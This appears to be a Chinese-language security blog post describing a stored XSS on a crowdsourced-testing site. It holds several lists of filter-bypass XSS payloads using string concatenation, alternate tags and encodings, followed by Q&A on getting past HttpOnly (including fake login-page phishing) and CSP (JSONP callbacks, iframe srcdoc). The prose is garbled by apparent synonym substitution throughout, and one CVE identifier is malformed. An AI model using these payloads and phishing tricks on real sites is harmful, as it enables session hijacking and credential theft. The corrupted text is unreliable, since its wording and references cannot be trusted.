这解释填写众测操持时,是可以实行html语句的,这里可以考试测验的操作是布局钓鱼链接,比如<a href="https://bbs.zkaq.cn/">我很来劲</a>
那试试能不能实行js呢,成立了就收成存储xss一枚
经初步测试创造,普通的弹窗对它来说是不起浸染的
开始fuzz
利用拼接函数
<svg onload="a(this);function a(){}(alert`1`)"><details ontoggle=this['ale'+'rt']`1` open><audio src/onerror=self['pro'+'mpt'](1)><img/src=1 onerror=window.alert(1)>
拦截
考试测验不同属性
<form action=javascript:alert(1)><input type=submit><object data=javascript:alert(1)>
拦截
考试测验不同标签
<body onload=alert(1)><marquee onstart=alert(1)><audio src onloadstart=alert(1)><video onloadstart=alert(1)><source><form onsubmit=alert(1)><input type=submit>
拦截
蟹不肉
编码
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') ><details open ontoggle=eval(atob('YWxlcnQoMSk='))><img/src=1 onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">< a href="javascript:al\u{65}rt(6)">XSS Test</ a>
终极,unicode编码成功绕过防护,网费拿下
把稳:漏洞挖掘一定要点到为止,不可以造孽获取网站的任何数据以及改动,作为安全职员更要在法律许可的范围内进行.未经授权的渗透一定不要干.
在创造漏洞后,尽快提交漏洞,联系厂商进行修复。
后记12期小老弟找事情中,本篇恰好又聊到了xss,咱就扯几道口试题(总群里的)吧,同学们有更好的思路不妨一起学习互换
Q1:如何绕过http-only?
A1:首先谈谈http-only,它的浸染仅仅是为了避免攻击者得到cookie信息,插还是能插的。
再看如何绕过,可以说说风哥提到的这两点 -- csrf、借助phpinfo()让页面显示cookie。
除此之外,还可以挟制钓鱼绕过,利用姿势为管理员触发xss后,当前页面即刻跳转至上岸界面,若管理员稍不留神填写了账号和密码,不就拿下了,为啥,由于上岸界面是假造的。
还有没有啥绕过办法,有啊,比如CVE-2012-005,只要攻击者向目标站点植入超大cookie,使得http头超过apache的最大要求长度,apache便会返回400状态码,以及被http-only保护的cookie
Q2:谈一谈csp安全策略,以及如何绕过?
A2:csp即为HTTP Header中的Content-Security-Policy,它存在的目的紧张是通过白名单的办法见告浏览器许可加载和不许可加载的资源。
详细用法可以利用script-src,让浏览器只能加载指定规则下的js代码,其他的都一律谢绝。
接着讲讲咋个绕过
姿势1 -- jsonp绕过,啥是jsonp,它首先基于json格式,存在的目的在于办理跨域要求资源
而它的事理则是动态地插入带有跨域url的script标签,然后调用回调函数,将用户所需的json数据作为参数传入,通过一些逻辑把数据显示在页面
说到这儿,自然是明白如何通过它绕过csp了,还不是由于它许可不屈安的回调方法,从而给攻击者实行xss创造了机会?直接callback=alert`1`就完事儿了。
姿势2 -- 利用iframe的srcdoc属性绕过csp,但有条件,那便是运用得许可加载来自白名单域的iframe,知足了这个条件就可以插了,咋插?用手插
